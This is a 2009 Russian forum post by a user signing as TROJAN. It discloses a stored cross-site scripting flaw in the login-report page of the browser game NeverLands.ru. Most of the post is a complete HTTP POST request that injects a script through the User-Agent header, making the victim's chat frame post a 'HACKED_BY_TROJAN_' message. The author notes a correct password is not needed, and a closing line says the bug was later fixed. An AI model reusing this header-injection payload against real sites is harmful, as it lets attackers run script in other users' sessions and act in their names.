27.01.2009, 20:48
|
|
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
Провел на форуме:
1449774
Репутация:
127
|
|
Активная XSS в NeverLands.ru
Вообщем давно обнаружил, ну думаю выложу)
Уязвимость появилась как администрация ввела "подробности" в отчёты по входам пользователей а точнее с какого браузера вошли или была попытка входа) Вообщем уязвимый параметр User-Agent ну и так как логируются и неправильные входы то чтобы заюзать уязвимость знание правильного пароля необязательно!
Пример использования:
Код:
POST http://www.neverlands.ru/game.php HTTP/1.0
Accept: */*
Referer: http://www.neverlands.ru/index.cgi
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: <script>top.frames['ch_buttons'].document.FBT.text.value="HACKED_BY_TROJAN_:008:";top.frames['ch_buttons'].document.FBT.sbmsg.click()</script><b>TROJAN</b>
Host: www.neverlands.ru
Content-Length: 58
Pragma: no-cache
Cookie: watermark=МЕТКО
player_nick=ЛОГИН&player_password=ПАСС&x=1&y=1
Ну и результатом такого пакета будет видимая надпись TROJAN вместо браузера) и выполненный скрипт который передаёт команду отправить сообщение нижнему фрейму и в чате увидим
Код:
ЛОГИН: HACKED_BY_TROJAN_
P.S. На момент публикации всё работает!
27.01.2009 баг пофиксили теперь при любом браузере пишется Undefined ( в переводе "неопределён")
TROJAN (с)
|
|
|